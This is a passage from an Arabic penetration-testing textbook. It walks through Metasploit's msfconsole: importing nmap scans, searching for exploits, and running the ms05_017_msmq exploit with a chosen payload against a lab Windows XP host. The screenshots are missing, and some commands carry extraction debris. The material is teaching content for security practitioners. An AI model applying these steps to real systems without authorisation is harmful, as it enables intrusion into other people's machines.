‫ﺗرﺣﯾب وﻋﻼﻣﺔ اﻟﻣﺣث]>‪ .[msf‬وھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻼﻓﺗﺎت ‪ Metasploit‬اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﺷواﺋﯾﺎ‪ ،‬ﻟذﻟك ﻓﻣن اﻟطﺑﯾﻌﻲ إذا اﻟﺷﺎﺷﺔ‬
‫ﺗﺑدو ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﻛل ﻣره‪ .‬اﻟﺷﻲء اﻟﻣﮭم ھو أن ﺗﺣﺻل ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﻣﺣث]>‪.[msf‬‬
‫اﻟﺷﺎﺷﺔ اﻷوﻟﯾﺔ ﻠﻠ ‪ Metasploit‬ﺗظﮭر ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪299‬‬

‫ﻣن ﻓﺿﻠك ﻻﺣظ‪ ،‬ﻋﻧد ﺗﺣﻣﯾل ‪ Metasploit‬ﻷول ﻣره‪ ،‬ﻓﺈﻧﮫ ﯾظﮭر ﻟك ﻋدد ‪ ،encoders ،payloads ،Exploits‬و‪ nops‬اﻟﻣﺗﺎﺣﺔ‪ .‬ﻛﻣﺎ‬
‫ﯾﻣﻛن أن ﺗظﮭر ﻟﻛم ﻛم ﯾوﻣﺎ ﻣر ﻣﻧذ آﺧر اﻟﺗﺣدﯾث‪ .‬ﺑﺳﺑب اﻟﻧﻣو اﻟﺳرﯾﻊ ‪ ،Metasploit‬وﻧﺷﺎط اﻟﻣﺟﺗﻣﻊ واﻟﺗﻣوﯾل اﻟﻣﺎدي‪ .‬ﻓﻣن اﻷھﻣﯾﺔ أن‬
‫ﺗﺣﺎﻓظ ﻋﻠﻰ ‪ Metasploit‬ﻣﺣدث اﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم‪ .‬وﯾﺗم إﻧﺟﺎز ھذا ﺑﺳﮭوﻟﺔ ﻋن طرﯾﻖ إدﺧﺎل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪#msfupdate‬‬
‫اﻵن ﺑﻌد ان ﺗم ﺗﺣدﯾث ‪ ،Metasploit‬دﻋوﻧﺎ ﻧﺑدأ اﺳﺗﻛﺷﺎف رواﺋﻊ ھذه اﻷداة‪ .‬ﻣن أﺟل اﺳﺗﺧدام ‪ ،Metasploit‬ﯾﺟب ﺗﺣدﯾد اﻟﮭدف‪ ،‬وﯾﺟب‬
‫اﺧﺗﯾﺎر ‪ ،exploit‬و‪ payloads‬اﻟﺗﻲ ﻧﺣﺗﺎﺟﮭﺎ وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ‪ ،‬ﺛم ﯾﺟب ﺗﺷﻐﯾل ‪ .exploit‬ﺳوف ﻧﺳﺗﻌرض اﻟﺗﻔﺎﺻﯾل ﻟﻛل ﺧطوة ﻣن‬
‫ھذه اﻟﺧطوات ﻓﻲ ﻟﺣظﺎت ﻗﻠﯾﻠﺔ‪ ،‬وﻟﻛن ﻗﺑل ذﻟك‪ ،‬دﻋوﻧﺎ ﻧﺳﺗﻌرض أﺳﺎﺳﯾﺎت ﻣﺻطﻠﺢ ‪ .Metasploit‬ﻛﻣﺎ ذﻛر ﻓﻲ وﻗت ﺳﺎﺑﻖ‪ ،‬اﻻﺳﺗﻐﻼل‬
‫)‪ (exploit‬ھو اﻟﺣﺻول ﻋﻠﻰ اﻷﻛواد اﻟﺟﺎھزة واﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ ﻧظﺎم ﺑﻌﯾد‪ .‬ھذه اﻷﻛواد ﯾﺳﺑب ﺑﻌض اﻟﺳﻠوك اﻟﻐﯾر طﺑﯾﻌﻲ ﻋﻠﻰ اﻟﻧظﺎم‬
‫اﻟﮭدف اﻟذي ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﺗﻧﻔﯾذ ‪ .payloads‬ﻧذﻛر ﺑﺄن ‪ payloads‬ھو أﯾﺿﺎ ﻛﺗﻠﺔ ﺻﻐﯾرة ﻣن اﻷﻛواد اﻟﺗﻲ ﺗﺳﺗﺧدم ﻷداء ﺑﻌض اﻟﻣﮭﺎم ﻣﺛل ﺗﺛﺑﯾت‬
‫ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ ،‬وإﻧﺷﺎء ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬أو ﻓﺗﺢ ‪ backdoor‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫ﻧﻘﺎط اﻟﺿﻌف )‪(vulnerabilities‬ھﻲ ﻧﻘﺎط اﻟﺿﻌف اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﺧﺗراق )‪(exploit‬اﻷﻧظﻣﺔ وﺗﻧﻔﯾذ اﻷﻛواد ﻋن ﺑﻌد )‪(payloads‬‬
‫ﻋﻠﻰ اﻟﮭدف‪ Payloads .‬ھﻲ ﺑراﻣﺞ إﺿﺎﻓﯾﺔ أو وظﺎﺋف اﻟﺗﻲ ﻧدﯾرھﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻣرة واﺣدة ﻓﻲ اﺧﺗراق ﻗد ﻧﻔذ ﺑﻧﺟﺎح‪.‬‬
‫ﻣﻌظم اﻟﻘﺎدﻣﯾن اﻟﺟدد ﯾﺗﯾﮭون ﻓﻲ اﻟﻌدد اﻟﮭﺎﺋل ﻣن ‪ exploit‬و‪payloads‬؛ ﻋﺎدة ﻣﺎ ﯾﺿﯾﻌون ﻓﻲ ﻣﺣﺎوﻟﺔ اﻟﻌﺛور ﻋﻠﻰ ‪ exploit‬اﻟﻣﻧﺎﺳﺑﺔ‪ .‬اﻧﮭم‬
‫ﯾﻘﺿون وﻗﺗﮭم ﻓﻲ رﻣﻲ ﻛل ‪ exploit‬ﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء ﻋﻠﻰ أﻣل أن ﯾﺣﺻل ﺷﯾﺋﺎ‪ .‬ﻻﺣﻘﺎ ﻓﻲ ھذا اﻟﻔﺻل‪ ،‬ﺳوف ﻧدرس أداة ﺗﻌﻣل ﺑﮭذه‬
‫اﻟطرﯾﻘﺔ وﻟﻛن اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ أن ﻧﻛون أﻛﺛر ﻣن ذﻟك ﺑﻘﻠﯾل‪.‬‬

‫ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم ‪ MSFCONSOLE‬ھﻲ ﻛﺎﻻﺗﻰ‪:‬‬

‫]?‪ :[help/‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﻌرض ﻣﻠﻔﺎت اﻟﻣﺳﺎﻋدة ﻟﻸواﻣر اﻟﺗﻲ ﺗﺣﺎول ﺗﺷﻐﯾﻠﮭﺎ‪.‬‬
‫]‪ :[use module‬ﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺑدء اﻋداد اﻟوﺣدة )‪ (module‬اﻟذى ﺗﺧﺗﺎرھﺎ‪.‬‬
‫]‪ :[set option_name module‬ﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻟوﺣدة )‪ (module‬اﻟﻣﺧﺗﺎرة‪.‬‬
‫]‪ :[exploit‬ھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل وﺣدة اﻻﺧﺗراق )‪.(exploit module‬‬
‫]‪ :[run‬ھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻟوﺣدات اﻷﺧرى اﻟﻐﯾر ﻣﺧﺻﺻﮫ ﻟﻼﺧﺗراق )‪.(non-exploit module‬‬
‫]‪ :[search module‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺑﺣث ﻋن وﺣدة ﻓردﯾﺔ‪.‬‬
‫]‪ :[exit‬ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﻟﻠﺧروج ﻣن ‪.MSFCONSOLE‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ أواﻣر ‪ ،Metasploit‬ﻓﺎن ‪ msfconsole‬ﺳوف ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗدﻋﺎء أواﻣر ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺳﺎﺳﯾﺔ ﻣﺛل ‪ ping‬أو ‪ .nmap‬ھذا‬
‫ﻣﻔﯾد ﻷﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺗﻧﻔﯾذ اﻟﻣﮭﺎم اﻟروﺗﯾﻧﯾﺔ دون أن ﺗﺗرك وﺣدة اﻟﺗﺣﻛم‪ .‬ﻓﻲ أول ﺧطوة ﻧﺧطوھﺎ‪ ،‬وﺳوف ﻧﺳﺗﺧدم ‪ nmap‬ﻟﻔﺣص‬
‫اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬اﻟﻧﺗﺎﺋﺞ ﯾﻣﻛن أن ﯾﺿﺎف ﺗﻠﻘﺎﺋﯾﺎ إﻟﻰ ‪ Metasploit‬ﺑﺎﺳﺗﺧدام ﻣﻠف ‪.XML‬‬

‫ﺳوف ﻧﻘوم اﻻن ﺑﺗﻧﻔﯾذ ﻋﻣﻠﯾﺔ اﺧﺗراق ﺑﺎﺳﺗﺧدام ‪MSFCONSOLE‬‬

‫ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﺳﺎﺑﻘﺎ ﺑدﻻ ﻣن رﻣﻲ ﻛل ‪ exploit‬ﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻹﯾﺟﺎد وﺳﯾﻠﺔ ﻹﯾﺟﺎد ‪ exploit‬اﻟﺟﺎھزة ﻓﻲ‬
‫‪ Metasploit‬ﻟﻣﻘﺎﺑﻠﺔ ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف‪ .‬ﻣن أﺟل رﺑط ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ ‪،Metasploit exploit‬‬
‫ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣراﺟﻌﺔ اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ ﺗوﺻﻠﻧﺎ إﻟﯾﮭﺎ ﻣن اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ )‪ (Scanning‬ﺳﻧﺑدأ ھذه اﻟﻌﻣﻠﯾﺔ ﻣن ﺧﻼل اﻟﺗرﻛﯾز ﻋﻠﻰ ﺗﻘرﯾر ‪Nessus‬‬
‫أو‪ OpenVAS‬او " >‪ ."nmap –script vuln <target‬ﺣﯾث ﻧذﻛر ﺑﺄن ھؤﻻء ﯾﺳﺗﺧدﻣوا ﻟﻔﺣص ﻧﻘﺎط اﻟﺿﻌف وﯾوﻓر ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﻣن‬
‫ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ أو اﻟﺑﺎﺗش اﻟﻣﻔﻘودة‪ .‬ﻋﻧد اﺳﺗﻌراض إﺧراج ‪ Nessus‬او ‪ ،OpenVAS‬ﯾﺟب ﻋﻠﯾك اﻟﺗﺄﻛد ﻣن اﻟﻣﻼﺣظﺎت وﻟﻛن‬
‫اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ وﺻﻔت ﺑﺄﻧﮭﺎ "ﻋﺎﻟﯾﺔ" أو "ﺑﺎﻟﻎ اﻷھﻣﯾﺔ" ﯾﺟب ان ﯾﻛون ﻟﮭﺎ اھﺗﻣﺎم ﺧﺎص‪ .‬اﻟﮭدف ﻣن ھذه اﻟﻣرﺣﻠﺔ ھو ﺗﺧﺻﯾص ‪ exploit‬ﻟﻧﻘﺎط‬
‫اﻟﺿﻌف اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﮭدف‪.‬‬

‫ﻧﻔﺗرض أن ﻟدﯾك ھدﻓﺎ ﺟدﯾدا ﻣﻊ ﻋﻧوان ‪ .[192.168.1.104] IP‬ﻣﻊ ﺗﺷﻐﯾل ‪ Nmap‬ﯾﺧﺑرك ان ھذا اﻟﮭدف اﻟﺟدﯾد ھو آﻟﺔ ذات ﻧظﺎم ﺗﺷﻐﯾل‬
‫وﯾﻧدوز ‪ XP Service pack 3‬وﺟدار ﺣﻣﺎﯾﺔ ﻏﯾر ﻣﻔﻌل‪ .‬ﻧﺳﺗﻣر ﻓﻲ اﻟﺧطوة ‪ ،2‬ﺣﯾث ﯾﻣﻛن ﺗﺷﻐﯾل ‪ Nessus‬او ‪ OpenVAS‬او ‪nmap‬‬
‫ﻋﻠﻰ اﻟﮭدف وذﻟك ﻹﻋطﺎﺋك ﺗﻘرﯾر ﻋن ﻧﻘﺎط اﻟﺿﻌف‪.‬‬

‫‪ -1‬ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ ‪ Nmap‬ﻋﻠﻰ ھذا اﻟﮭدف ﺑﺎﺳﺗﺧدام ‪ msfconsole‬ﻹﻋطﺎء ﺗﻘرﯾر ﻋن اﻟﺧدﻣﺎت ﻋن اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪300‬‬

‫‪ -2‬ھﻧﺎ ﻗﻣﻧﺎ ﺑﻔﺣص اﻟﻧظﺎم اﻟﮭدف ﺛم ﺣﻔظﻧﺎ ﻧﺎﺗﺞ اﻟﻔﺣص ﻓﻲ ﻣﻠف ‪ xml‬ﺑﺎﺳم ‪ my.xml‬وذﻟك ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر ‪.–oX‬‬
‫‪ -3‬ﺳﻧﻘوم ﺑﺎﺳﺗﯾراد ھذه اﻟﻧﺗﺎﺋﺞ ﻣن ‪ nmap‬اﻟﻰ ‪ Metasploit‬ﺑﺎﺳﺗﺧدام ﻣﻠف ‪ xml‬اﻟذي أﻧﺷﺄﻧﺎه‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل إﺻدار‬
‫اﻷواﻣر اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -4‬ﻧﻼﺣظ وﺟود ﻣﺷﻛﻠﮫ وھﻲ ان ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ﻏﯾر ﻣﺗﺻﻠﺔ وﻹﺛﺑﺎت ذﻟك ﻧﻛﺗب اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ -5‬ﻟﺣل ھذه اﻟﻣﺷﻛﻠﺔ ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -6‬ﻟﻠﺗﺄﻛد ﻣن ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ﺳﻠﯾﻣﮫ ﻧدﺧل ﻋﻠﻰ ‪ msfconsole‬ﺛم ﻧﻛﺗب ‪ db_status‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺑدء ﺧدﻣﺗﻲ ‪ postgresql‬و‪ Metasploit‬ﺑطرﯾﻘﮫ اﻟﯾﮫ ﻋﻧد إﻋﺎدة اﻟﺗﺷﻐﯾل ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ اﺳﺗﺧدام‬
‫‪.update-rc.d‬‬
‫‪#update-rc.d©postgresql©enable‬‬
‫‪#update-rc.d©metasploit©enable‬‬

‫‪ -7‬ﻧﻘوم اﻻن ﺑﺈدراج ﻧﺎﺗﺞ اﻻﻣر ‪ nmap‬اﻟﻰ ‪ metasploit‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﻧﻘوم ﺑﻔﺣص ﺳرﯾﻊ ﻟﻸﻣر ‪ hosts‬واﻟذي ﯾدل ﻋﻠﻰ أن ﻋﻣﻠﯾﺔ اﻻﺳﺗﯾراد ﻟدﯾﻧﺎ ﻧﺎﺟﺣﺔ‪ .‬اﻻن و‪ Metasploit‬ﻟدﯾﮫ ﺑﯾﺎﻧﺎت ‪.nmap‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪301‬‬

‫‪ -9‬ﻟرؤﯾﺔ اﻟﺧدﻣﺎت اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻓﻲ ‪ metasploit‬ﯾﻣﻛﻧك ذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ services‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -10‬ﯾﻣﻛﻧك ﻋﻣل اﻟﺧطوﺗﯾن اﻟﺳﺎﺑﻘﺗﯾن وھو اﻟﻔﺣص ﺑﺑرﻧﺎﻣﺞ ‪ nmap‬وإدﺧﺎل ﻧﺎﺗﺞ اﻻﻣر اﻟﻰ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ metasploit‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -11‬ﺛم ﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن أن ‪ Metasploit‬ﻟدﯾﮫ اﻟﻣﻌﻠوﻣﺎت ذات اﻟﺻﻠﺔ ﺑﻘﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑﮫ ﺑﺎﺳﺗﺧدام اﻻﻣرﯾن ‪hosts‬‬
‫و‪ services‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -12‬ﯾﻛﺷف اﻷﻣر ‪ services‬ﻣﺛﻼ ان اﻟﻧظﺎم اﻟﮭدف ﯾﺳﺗﺧدم اﻟﺧدﻣﺔ ‪ .msrpc‬دﻋوﻧﺎ ﻧرى ﻣﺎ إذا ﻛﻧﺎ ﻧﺳﺗطﯾﻊ اﻟﺑﺣث ﻋن ‪ exploit‬ﺗﺧص‬
‫ھذا واﻻﺳﺗﻔﺎدة ﻣن ذﻟك‪ .‬ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻋﻧد ﻣﮭﺎﺟﻣﺔ ﺧﺎدم اﻟوﯾب اﻟﺣﻘﯾﻘﻲ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﻧﺣن ﻻ ﻧﺣﺗﺎج ﺑﺎﻟﺿرورة إﻟﻰ‬
‫ﻣﺣﺎوﻟﺔ اﺳﺗﻐﻼل ﻧﻘطﺔ ﺿﻌف ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺣﯾث ان اﻟﻣﮭﺎﺟم اﻟﺣﻘﯾﻘﻲ ﯾﺳﺗﻔﯾد ﻣن ﺟﻣﯾﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺧﺎدم اﻟوﯾب‬
‫ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪302‬‬

‫‪ -13‬ﻧﺳﺗﺧدم اﻻﻣر ‪ search‬ﻟﻧرى اﻟﻌدﯾد ﻣن ‪ exploit‬اﻟﻣﺗﺎﺣﺔ اﻟﺧﺎﺻﺔ ب ‪ .msrpc‬ﻟﻧﺟد ان ﻟدﯾﮭم أﯾﺿﺎ ﺗﺻﻧﯾف‪ .‬ﯾﻔﺿل اﺳﺗﺧدام‬
‫ﺻﺎﺣب اﻟﺗﺻﻧﯾف ‪.excellent‬ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌرف ﺣول ھذه اﻟوﺣدات ﻣن ﺧﻼل ﻣوﻗﻊ اﻟوﯾب اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.metasploit.com/modules/exploit/‬‬

‫‪ -14‬ﺳوف ﻧﺳﺗﺧدم ‪ ms05_017_msmq‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -15‬ﺑﻣﺟرد ﺗﺣدﯾد ‪ ،exploit‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ اﻟﻰ ان ﻧرى ﻣﺎ ھﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ ﻗﺑل أن ﻧﺗﻣﻛن ﻣن ﺗﻧﻔﯾذ اﺧﺗﯾﺎرﻧﺎ‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك‬
‫ﻋن طرﯾﻖ ﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ اﻟﻣدرﺟﺔ ﻓﻲ اﻹﺧراج واﺧﺗﯾﺎر ‪ payloads‬اﻟﺗﻲ ﻧرﯾد ﺗﺳﻠﯾﻣﮭﺎ‪ .‬ﻧﺻدر اﻷﻣر ‪show options‬‬
‫ﻟﻌرض اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ‪:‬‬

‫‪ -16‬ﯾﻣﻛﻧﻧﺎ أن ﻧرى ﻣن ھذا اﻟﻣﺛﺎل أﻧﻧﺎ ﺑﺣﺎﺟﺔ إﻟﻰ إدﺧﺎل ﺑﯾﺎﻧﺎت ‪ RHOST. RHOST‬ھو ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﺑﻌﯾد اﻟﮭدف‪ .‬وﻧﺣن‬
‫ﺑﺣﺎﺟﺔ أﯾﺿﺎ ﻟﺗﺣدﯾد اﻟﺣﻣوﻟﺔ ‪ payloads‬ووﺿﻊ ﺧﯾﺎرات ‪ .payloads‬رﺑﻣﺎ ﯾﻛون ھﻧﺎك اﻟﻌدﯾد ﻣن ‪ payloads‬ﻣﺗﻌددة ﻟﻼﺧﺗﯾﺎر‬
‫ﻣن ﺑﯾﻧﮭﺎ‪ .‬ﻟﻣﻌرﻓﺔ ‪ payloads‬اﻟﻣﺗﺎﺣﺔ‪ ،‬إﺻدار اﻷﻣر ‪.show payloads‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪303‬‬

‫‪ -17‬ﺑﻣﺟرد رؤﯾﺔ ‪ Payloads‬اﻟﺗﻲ ﺗرﯾدھﺎ ﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ إدراج ‪ payloads‬ﻻﺳﺗﺧداﻣﮫ ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.set PAYLOAD‬‬

‫‪ -18‬ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن وﺿﻊ اﻻﻋدادات اﻟﻰ ﺗرﯾدھﺎ ﻧﻘوم ﺑﺗﺷﻐﯾل ‪.exploit‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻣﻠﺧص ﻟﻠﺧطوات اﻟﺳﺎﺑﻘﺔ‪:‬‬

‫‪ .1‬ﻧﺑدأ ‪ metasploit‬ﻋن طرﯾﻖ ﻓﺗﺢ اﻟﺗرﻣﻧﺎل ﺛم ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬


‫‪#msfconsole‬‬
‫‪ .2‬ﻧﺳﺗﺧدم اﻻﻣر ‪ search‬ﻓﻲ ‪ metasploit‬وذﻟك ﻟﻠﺑﺣث ﻋن ‪ exploit‬اﻟﻣﻧﺎﺳب اﻟﺗﻲ ﺗﻘﺎﺑل ﻧﻘطﺔ اﻟﺿﻌﻔﺔ اﻟﻣوﺟودة ﻓﻲ ﺗﻘﺎرﯾر اﻟﻔﺣص‪.‬‬
‫)‪msf> search missing_patch_number (or CVE‬‬
‫‪ .3‬ﻧﺳﺗﺧدم اﻻﻣر ‪ use‬ﻻﺧﺗﯾﺎر ‪ exploit‬اﻟذي ﺗرﯾده‪.‬‬
‫‪msf> use exploit_name_and_path‬‬
‫‪ .4‬ﻧﺳﺗﺧدم اﻻﻣر ‪ show payloads‬ﻟﻌرض ‪ payloads‬اﻟﻣﺗﺎﺣﺔ‪.‬‬
‫‪msf> show payloads‬‬
‫‪ .5‬ﻧﺳﺗﺧدم اﻻﻣر ‪ set‬ﻻﺧﺗﯾﺎر ‪.payloads‬‬
‫‪msf> set payload path_to_payload‬‬
‫‪ .6‬ﻧﺳﺗﺧدم اﻻﻣر ‪ show options‬ﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻟﺧﯾﺎرات اﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ وﺿﻌﮭﺎ ﻗﺑل اﺧﺗراق اﻟﮭدف‪.‬‬
‫‪msf> show options‬‬
‫‪ .7‬ﻧﺳﺗﺧدم اﻻﻣر ‪ set‬ﻣﻊ أي ﺧﯾﺎر وذﻟك ﻹﻋداد ﻗﯾﻣﮫ‪.‬‬
‫‪msf> set option_name desired_option_input‬‬
‫‪ .8‬ﻧﺳﺗﺧدم اﻻﻣر ‪ exploit‬ﻟﺗﺷﻐﯾل ‪ exploit‬ﺿد اﻟﮭدف‪.‬‬
‫اﻵن ﻟدﯾك ﻓﮭم أﺳﺎﺳﻲ ﻟﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ ،Metasploit‬ﻣن اﻟﻣﮭم اﺳﺗﻌراض ﻋدد ﻗﻠﯾل ﻣن أﻛﺛر ‪ payloads‬اﻷﺳﺎﺳﯾﺔ اﻟﻣﺗوﻓرة ﻟدﯾك‪ .‬ﻋﻠﻰ‬
‫اﻟرﻏم ﻣن أن ﺣﻘن ‪ VNC‬ھو ﺑﺎرد ﺑﺷﻛل ﻻ ﯾﺻدق وﻛﺑﯾرة ﻹﻗﻧﺎع اﻷﺻدﻗﺎء واﻷﻗﺎرب‪ ،‬وزﻣﻼء اﻟﻌﻣل‪ ،‬وﻧﺎدرا ﻣﺎ ﯾﺳﺗﺧدم ﻓﻲ اﺧﺗﺑﺎر‬
‫اﻻﺧﺗراق اﻟﻔﻌﻠﻲ‪ .‬ﻓﻲ ﻣﻌظم اﻟﺗﺟﺎرب اﻻﺧﺗراق‪ ،‬اﻟﻘراﺻﻧﺔ ﺗﻔﺿل اﺳﺗﺧدام ﺑﯾﺋﺔ ﺳطر اﻷواﻣر ﺑﺳﯾطﺔ ﻣﻣﺎ ﯾﺗﯾﺢ اﻟوﺻول واﻟﺗﺣﻛم ﻋن ﺑﻌد ﻓﻲ‬
‫اﻟﺟﮭﺎز اﻟﮭدف‪ .‬اﻟﺟدول اﻟﺗﺎﻟﻲ ﺑﮫ ﻻﺋﺣﺔ ﻟﺑﻌض ‪ payloads‬اﻷﺳﺎﺳﯾﺔ‪ .‬ﯾرﺟﻰ اﻟرﺟوع إﻟﻰ وﺛﺎﺋﻖ ‪ Metasploit‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻛﺎﻣﻠﺔ‪.‬‬
‫ﻧﺗذﻛر‪ ،‬واﺣدة ﻣن ﺻﻼﺣﯾﺎت ‪ Metasploit‬ھو اﻟﻘدرة ﻋﻠﻰ ﻣزج وﻣﻘﺎﺑﻠﺔ ‪ exploit‬و‪ .payloads‬ھذا ﯾوﻓر ﻟﻣﺧﺗﺑر اﻻﺧﺗراق ﻛﻣﯾﺔ ﻻ‬
‫ﺗﺻدق ﻣن اﻟﻣروﻧﺔ‪ ،‬ﻣﻣﺎ ﯾﺗﯾﺢ وظﺎﺋف ‪ Metasploit‬ﻟﻠﺗﻐﯾﯾر اﻋﺗﻣﺎدا ﻋﻠﻰ اﻟﻧﺗﯾﺟﺔ اﻟﻣرﺟوة‪ .‬ﻣن اﻟﻣﮭم أن ﺗﺻﺑﺢ ‪ payloads‬ﻣﺄﻟوﻓﺔ ﻣﻊ‬
‫ﻣﺧﺗﻠف اﻻﺣﺗﻣﺎﻻت اﻟﻣﺗﺎﺣﺔ ﻟك‪.‬‬

‫ﯾوﺟد اﻟﻌدﯾد ﻣن ھذه ‪ payloads‬ﻧﻔﺳﮭﺎ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻻﺧرى ﻟﯾﻧﻛس‪ ،OS X ،BSD ،‬وﻏﯾرھﺎ ﻣن أﻧظﻣﺔ اﻟﺗﺷﻐﯾل‪ .‬ﻣرة أﺧرى‪ ،‬ﯾﻣﻛﻧك‬
